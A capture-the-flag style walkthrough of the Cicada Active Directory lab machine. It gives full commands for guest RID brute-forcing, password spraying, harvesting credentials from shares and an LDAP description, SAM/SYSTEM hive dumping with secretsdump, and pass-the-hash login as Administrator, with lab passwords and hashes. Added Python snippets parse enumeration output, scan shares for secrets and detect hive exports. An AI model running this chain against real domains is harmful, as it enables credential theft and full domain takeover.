## Recon

### [[LDAP - Enumeration|LDAP - Enumeration]]

- anonymous bind disallowed

```sh
ldapsearch -x -H ldap://$RHOST -s base -b "" "(objectclass=*)"
```

### [[SMB Enumeration|SMB Enumeration]]

- guest login permitted
- null session permitted
- can read share "HR"

![[Pasted image 20250131151720.png]]

**dumping the share:**

```sh
smbclient //$RHOST/HR -U 'guest'
```

- contains the file "Notice from HR.txt"

```
cat Notice\ from\ HR.txt
Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp
```

so we got a password: `Cicada$M6Corpb*@Lp#nZp!8`

### Username Enumeration

- [x] `rpcclient -U '' -N $RHOST` -> `enumdomusers` - not permitted
- [x] common username password spraying - no love - used a custom list and one from seclists
- [x] ldap user enum - anonymous bind not permitted....
- running `kerbrute`:

```shell
kerbrute userenum -d cicada.htb --dc $RHOST xato-net-10-million-usernames.txt
```

no love

RID brute-forcing through the `guest` account does work, though:

```
nxc smb $RHOST -u 'guest' -p '' --rid-brute
SMB  10.10.11.35  445  CICADA-DC  [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB  10.10.11.35  445  CICADA-DC  [+] cicada.htb\guest:
SMB  10.10.11.35  445  CICADA-DC  498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  500: CICADA\Administrator (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  501: CICADA\Guest (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  502: CICADA\krbtgt (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  512: CICADA\Domain Admins (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  513: CICADA\Domain Users (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  514: CICADA\Domain Guests (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  515: CICADA\Domain Computers (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  516: CICADA\Domain Controllers (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  517: CICADA\Cert Publishers (SidTypeAlias)
SMB  10.10.11.35  445  CICADA-DC  518: CICADA\Schema Admins (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  519: CICADA\Enterprise Admins (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  525: CICADA\Protected Users (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  526: CICADA\Key Admins (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB  10.10.11.35  445  CICADA-DC  571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB  10.10.11.35  445  CICADA-DC  572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB  10.10.11.35  445  CICADA-DC  1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1101: CICADA\DnsAdmins (SidTypeAlias)
SMB  10.10.11.35  445  CICADA-DC  1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  1103: CICADA\Groups (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  1104: CICADA\john.smoulder (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1105: CICADA\sarah.dantelia (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1106: CICADA\michael.wrightson (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1108: CICADA\david.orelious (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1109: CICADA\Dev Support (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  1601: CICADA\emily.oscars (SidTypeUser)
```

we dump these users into a file:

```
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
```

we attempt to password spray again:

```sh
nxc smb $RHOST -u RID-user-dump.txt -p passwords.txt --continue-on-success
```

![[Pasted image 20250131163122.png]]

and we get:

```
michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
```

## `michael.wrightson` -> `david.orelious`

Now that we've got some creds, I'll do some more authenticated enumeration:

```sh
nxc smb $RHOST -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
```

- can read [[SMB Share - SYSVOL]]
- does not seem to be able to use [[WinRM - 5986 HTTP]]
- can access [[LDAP - Enumeration|LDAP - Enumeration]]

![[Pasted image 20250131164150.png]]

- someone conveniently left their password in their LDAP user description <3
- `david.orelious:aRt$Lp#7t*VQ!3`

## `david.orelious` -> `emily.oscars`

we rinse and repeat the enumeration process for this dude

**winrm:**

```
nxc winrm $RHOST -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3'
```

winrm does not seem permitted.

**ldap:** yields the same as previous

**another password spray:** yields nada

**Checking SMB:**

```
nxc smb $RHOST -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
```

- can read the `DEV` share
- can read `NETLOGON` share?
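The "dump these users into a file" step above was done by hand. As an added example (not part of the original note, and not a NetExec feature), the parser below turns `--rid-brute` output into the list of domain-created user accounts automatically, using the two facts that make the manual filtering work: RIDs below 1000 are well-known built-in principals (Administrator, Guest, krbtgt, the default groups), and a trailing `$` marks a machine account. The sample output is a constructed subset of the real lines shown above; the regex tolerates the wider column spacing the real tool prints.

```python
import re

# Constructed sample in the shape of the `nxc smb --rid-brute` output above
# (a subset of the page's lines; RIDs and names are the ones the note shows).
SAMPLE_OUTPUT = """\
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\\guest:
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\\Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\\Guest (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\\krbtgt (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 513: CICADA\\Domain Users (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\\CICADA-DC$ (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\\john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\\sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\\michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\\Dev Support (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\\emily.oscars (SidTypeUser)
"""

# One result line: protocol, host, port, hostname, "<rid>: DOMAIN\name (SidTypeX)".
# \s+ instead of single spaces so the real tool's padded columns also match.
RID_LINE = re.compile(
    r"^SMB\s+\S+\s+\d+\s+\S+\s+(?P<rid>\d+):\s+(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\((?P<type>SidType\w+)\)\s*$"
)


def parse_rid_lines(text):
    """Return [(rid, domain, name, sidtype)] for every RID result line; banner lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = RID_LINE.match(line)
        if m:
            rows.append((int(m["rid"]), m["domain"], m["name"], m["type"]))
    return rows


def classify_rid(rid, name):
    """Well-known principals live below RID 1000; computer accounts end in '$'; the rest were created by admins."""
    if rid < 1000:
        return "well-known"
    if name.endswith("$"):
        return "machine"
    return "domain-created"


def human_user_accounts(text):
    """sAMAccountNames of SidTypeUser entries that are neither built-in nor machine accounts."""
    return [
        name
        for rid, _domain, name, sidtype in parse_rid_lines(text)
        if sidtype == "SidTypeUser" and classify_rid(rid, name) == "domain-created"
    ]


def sidtype_counts(text):
    """How many users / groups / aliases the enumeration exposed, for a quick sense of what a guest can see."""
    counts = {}
    for _rid, _domain, _name, sidtype in parse_rid_lines(text):
        counts[sidtype] = counts.get(sidtype, 0) + 1
    return counts


if __name__ == "__main__":
    print("\n".join(human_user_accounts(SAMPLE_OUTPUT)))
    print(sidtype_counts(SAMPLE_OUTPUT))
```

From the defensive side the same parser doubles as an audit: if it returns anything at all when run against output obtained with `-u 'guest' -p ''`, the guest account is enabled and RID cycling is exposing the user list to anyone on the network.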
**Dumping the `DEV` share:**

```
smbclient //$RHOST/DEV -U david.orelious
```

yields `Backup_script.ps1`:

```powershell
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
```

we got another set of credentials: `emily.oscars:Q!3@Lp#M6b*7t*Vt`

## `emily.oscars` -> `Administrator`

### SMB

- can READ [[SMB Share - ADMIN$]] - indicating this lady is in the `Administrators` group
- can `READ,WRITE` on the `C$` share

### [[WinRM - 5986 HTTP]]

- can authenticate using [[Evil-WinRM]]
- we're in bby

### Local Access

**Some manual enumeration:**

```powershell
whoami /groups

# get all domain users
net user /domain
Get-ADUser -Filter * | Select Name,SamAccountName

# get admin users
Get-ADUser -Filter {AdminCount -eq 1} -Properties * | Select Name,SamAccountName,MemberOf
```

reveals we're already in the `Administrators` group as well as in [[AD Group - Backup Operator]] (Backup Operators). We use the following commands to dump the `SAM` and `SYSTEM` hives:

```
reg save hklm\sam c:\windows\tasks\SAM
reg save hklm\system c:\windows\tasks\SYSTEM
```

then we use [[Evil-WinRM]]'s built-in download functionality to save them to our local system.

we proceed to use [[Methodology/0 - Infrastructure/noctua/Arsenal/lateral_movement/Impacket|Impacket]]'s `secretsdump.py` to dump the SAM database, which yields the local **NTLM hashes** for users on the system:

```sh
secretsdump.py -sam SAM -system SYSTEM LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
```

lastly we utilize the freshly dumped hash for the `Administrator` account to gain remote access through [[Evil-WinRM]]:

```
evil-winrm -i $RHOST -u 'Administrator' -H 2b87e7c93a3e8a0ea4a581937016f341
```
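Two of the three credential leaks in this box were files sitting on readable shares: the HR welcome note and `Backup_script.ps1` with a `ConvertTo-SecureString ... -AsPlainText` literal. As an added example (not from the original note), the scanner below is the kind of check a blue team runs over share contents to catch exactly that. The rules, the masking and the sample files are constructed for this example; the sample files are trimmed copies of the two artifacts above.

```python
import re

# Constructed samples modelled on the two files found on the HR and DEV shares above.
SAMPLE_FILES = {
    "HR/Notice from HR.txt": """Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team.
As part of our security protocols, it's essential that you change your default password.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
""",
    "DEV/Backup_script.ps1": """$sourceDirectory = "C:\\smb"
$destinationDirectory = "D:\\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
""",
}

# Each rule is (name, pattern); the pattern captures the secret in the group "secret".
RULES = [
    ("powershell-securestring-plaintext",
     re.compile(r'ConvertTo-SecureString\s+"(?P<secret>[^"]+)"\s+-AsPlainText', re.I)),
    ("powershell-password-literal",
     re.compile(r'\$(?:pass|passwd|password|pwd)\s*=\s*"(?P<secret>[^"]+)"', re.I)),
    ("prose-password-disclosure",
     re.compile(r'password\s+is\s*:\s*(?P<secret>\S+)', re.I)),
]


def mask(secret, keep=2):
    """Keep a short prefix so the finding can be triaged without re-exposing the secret in a report."""
    return secret[:keep] + "*" * max(len(secret) - keep, 0)


def scan_text(path, text):
    """Run every rule over every line; return one finding per (line, rule) hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in RULES:
            m = pattern.search(line)
            if m:
                findings.append({"file": path, "line": lineno, "rule": rule,
                                 "preview": mask(m["secret"])})
    return findings


def scan_files(files):
    """files: mapping of share-relative path -> file contents (as pulled from a share listing)."""
    out = []
    for path, text in files.items():
        out.extend(scan_text(path, text))
    return out


if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f['file']}:{f['line']}  {f['rule']}  {f['preview']}")
```

In practice the `files` mapping would be filled from a recursive share walk with the same low-privilege account the attacker used here (guest, or any domain user), since the point is to see what that account can read; anything the scanner flags should be rotated, not just deleted.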
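The final step works because Backup Operators membership lets `reg save` export the `SAM` and `SYSTEM` hives, and the two together are enough for `secretsdump.py` to recover local hashes offline. As an added example (not from the original note), the detection below runs that logic over process-creation events: it flags any `reg save` of `SAM`, `SYSTEM` or `SECURITY`, notes when the parent is `wsmprovhost.exe` (the WinRM host process, which is what an Evil-WinRM session runs under), and raises severity when one user exports both `SAM` and `SYSTEM`. The event shape is a constructed, minimal Sysmon Event ID 1 style dict, not real telemetry from the box.

```python
import ntpath
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields, trimmed).
# The first two mirror the `reg save` commands used above; the others are benign noise.
SAMPLE_EVENTS = [
    {"EventID": 1, "User": "CICADA\\emily.oscars",
     "Image": "C:\\Windows\\System32\\reg.exe",
     "ParentImage": "C:\\Windows\\System32\\wsmprovhost.exe",
     "CommandLine": "reg save hklm\\sam c:\\windows\\tasks\\SAM"},
    {"EventID": 1, "User": "CICADA\\emily.oscars",
     "Image": "C:\\Windows\\System32\\reg.exe",
     "ParentImage": "C:\\Windows\\System32\\wsmprovhost.exe",
     "CommandLine": "reg save hklm\\system c:\\windows\\tasks\\SYSTEM"},
    {"EventID": 1, "User": "CICADA\\sarah.dantelia",
     "Image": "C:\\Windows\\System32\\reg.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"},
    {"EventID": 1, "User": "CICADA\\emily.oscars",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\wsmprovhost.exe",
     "CommandLine": "cmd.exe /c whoami /groups"},
]

# `reg save` (or reg.exe save) of one of the three hives that hold credential material.
HIVE_SAVE = re.compile(
    r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(?P<hive>sam|system|security)\b",
    re.I,
)
SENSITIVE_PAIR = {"SAM", "SYSTEM"}
WINRM_HOST = "wsmprovhost.exe"


def hive_saved(event):
    """Return the hive name (upper-case) if the event is a credential-hive export, else None."""
    if ntpath.basename(event.get("Image", "")).lower() != "reg.exe":
        return None
    m = HIVE_SAVE.search(event.get("CommandLine", ""))
    return m["hive"].upper() if m else None


def detect(events):
    """One alert per hive export, plus a high-severity alert when a user exports both SAM and SYSTEM."""
    alerts = []
    hives_by_user = {}
    for e in events:
        hive = hive_saved(e)
        if hive is None:
            continue
        via_winrm = ntpath.basename(e.get("ParentImage", "")).lower() == WINRM_HOST
        alerts.append({"rule": "registry-hive-export", "user": e["User"], "hive": hive,
                       "severity": "medium", "via_winrm": via_winrm})
        hives_by_user.setdefault(e["User"], set()).add(hive)
    # SAM alone is not enough: the hashes are encrypted with the boot key that lives in SYSTEM,
    # so the pair is the signal that an offline dump (secretsdump-style) is possible.
    for user, hives in hives_by_user.items():
        if SENSITIVE_PAIR <= hives:
            alerts.append({"rule": "sam-system-hive-pair", "user": user, "severity": "high"})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a)
```

The rule keys on the command line rather than on group membership, so it also catches the same export done by a local administrator; the Backup Operators angle is better handled as a separate audit of who holds that group, since the box shows it is effectively equivalent to local admin on the DC.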